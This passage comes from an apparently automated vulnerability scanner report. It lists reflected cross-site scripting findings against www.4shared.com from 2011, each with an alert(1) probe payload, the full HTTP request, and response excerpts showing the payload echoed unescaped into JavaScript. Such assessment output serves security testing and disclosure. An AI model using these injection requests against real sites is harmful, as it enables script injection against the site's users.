User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/asf-logo.gif6b95f'-alert(1)-'1357208e352
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:39 GMT
Content-Length: 38628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/asf-logo.gif6b95f'-alert(1)-'1357208e352',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.47. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 110ef"-alert(1)-"cbe7b0fb8bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images/asf-logo.gif110ef"-alert(1)-"cbe7b0fb8bd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/asf-logo.gif110ef"-alert(1)-"cbe7b0fb8bd
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:37 GMT
Content-Length: 38810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/asf-logo.gif110ef"-alert(1)-"cbe7b0fb8bd";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.48. http://www.4shared.com/images/tomcat.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a4fb'-alert(1)-'af400b9bbf6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images3a4fb'-alert(1)-'af400b9bbf6/tomcat.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images3a4fb'-alert(1)-'af400b9bbf6/tomcat.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:27 GMT
Content-Length: 38801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images3a4fb'-alert(1)-'af400b9bbf6/tomcat.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fu
...[SNIP]...

2.49. http://www.4shared.com/images/tomcat.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a615"-alert(1)-"4d130b814a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images6a615"-alert(1)-"4d130b814a9/tomcat.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images6a615"-alert(1)-"4d130b814a9/tomcat.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:25 GMT
Content-Length: 38805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images6a615"-alert(1)-"4d130b814a9/tomcat.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.50. http://www.4shared.com/images/tomcat.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef15f'-alert(1)-'638e68140b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images/tomcat.gifef15f'-alert(1)-'638e68140b8 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/tomcat.gifef15f'-alert(1)-'638e68140b8
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:41 GMT
Content-Length: 38625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
ginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/tomcat.gifef15f'-alert(1)-'638e68140b8',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.51. http://www.4shared.com/images/tomcat.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/tomcat.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72d4f"-alert(1)-"5ac35c7e5b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images/tomcat.gif72d4f"-alert(1)-"5ac35c7e5b0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/tomcat.gif72d4f"-alert(1)-"5ac35c7e5b0
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:37 GMT
Content-Length: 38801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/tomcat.gif72d4f"-alert(1)-"5ac35c7e5b0";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.52. http://www.4shared.com/images/void.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/void.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9a1"-alert(1)-"4062e8ef85a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images1b9a1"-alert(1)-"4062e8ef85a/void.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images1b9a1"-alert(1)-"4062e8ef85a/void.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:32 GMT
Content-Length: 38616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images1b9a1"-alert(1)-"4062e8ef85a/void.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.53. http://www.4shared.com/images/void.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/void.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 567f5'-alert(1)-'059fe02c858 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images567f5'-alert(1)-'059fe02c858/void.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images567f5'-alert(1)-'059fe02c858/void.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:34 GMT
Content-Length: 38788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images567f5'-alert(1)-'059fe02c858/void.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.54. http://www.4shared.com/images/void.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/void.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1f98"-alert(1)-"e9252717822 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images/void.giff1f98"-alert(1)-"e9252717822 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/void.giff1f98"-alert(1)-"e9252717822
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:44 GMT
Content-Length: 38789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/void.giff1f98"-alert(1)-"e9252717822";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.55. http://www.4shared.com/images/void.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/void.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b80f'-alert(1)-'86a0d9e7305 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images/void.gif6b80f'-alert(1)-'86a0d9e7305 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/void.gif6b80f'-alert(1)-'86a0d9e7305
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:46 GMT
Content-Length: 38617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/void.gif6b80f'-alert(1)-'86a0d9e7305',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.56. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20img%20+%20'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6248'-alert(1)-'b993a65eb35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsd6248'-alert(1)-'b993a65eb35/'%20+%20img%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsd6248'-alert(1)-'b993a65eb35/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:10 GMT
Content-Length: 38647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsd6248'-alert(1)-'b993a65eb35/'%20+%20img%20+%20'',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

2.57. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20img%20+%20'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e09e2"-alert(1)-"8363f936c08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jse09e2"-alert(1)-"8363f936c08/'%20+%20img%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jse09e2"-alert(1)-"8363f936c08/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:08 GMT
Content-Length: 38823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jse09e2"-alert(1)-"8363f936c08/'%20+%20img%20+%20'";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

2.58. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20img%20+%20'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53ef4'-alert(1)-'a73e7efb6a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/'%20+%20img%20+%20'53ef4'-alert(1)-'a73e7efb6a5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'53ef4'-alert(1)-'a73e7efb6a5
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:21 GMT
Content-Length: 38652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/'%20+%20img%20+%20'53ef4'-alert(1)-'a73e7efb6a5',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.59. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20img%20+%20'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e23b7"-alert(1)-"ddd5fafebed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/'%20+%20img%20+%20'e23b7"-alert(1)-"ddd5fafebed HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'e23b7"-alert(1)-"ddd5fafebed
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:19 GMT
Content-Length: 38827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/'%20+%20img%20+%20'e23b7"-alert(1)-"ddd5fafebed";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.60. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20val%20+%20'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32262"-alert(1)-"5ea80ba4494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js32262"-alert(1)-"5ea80ba4494/'%20+%20val%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js32262"-alert(1)-"5ea80ba4494/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:07 GMT
Content-Length: 38647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js32262"-alert(1)-"5ea80ba4494/'%20+%20val%20+%20'";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

2.61. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20val%20+%20'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ae46'-alert(1)-'e9717228dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js2ae46'-alert(1)-'e9717228dec/'%20+%20val%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js2ae46'-alert(1)-'e9717228dec/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:09 GMT
Content-Length: 38824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js2ae46'-alert(1)-'e9717228dec/'%20+%20val%20+%20'',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

2.62. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20val%20+%20'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4048b'-alert(1)-'e8ba1bdb223 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/'%20+%20val%20+%20'4048b'-alert(1)-'e8ba1bdb223 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'4048b'-alert(1)-'e8ba1bdb223
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:21 GMT
Content-Length: 38645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/'%20+%20val%20+%20'4048b'-alert(1)-'e8ba1bdb223',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.63. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/'%20+%20val%20+%20'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a806a"-alert(1)-"8921d112299 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/'%20+%20val%20+%20'a806a"-alert(1)-"8921d112299 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

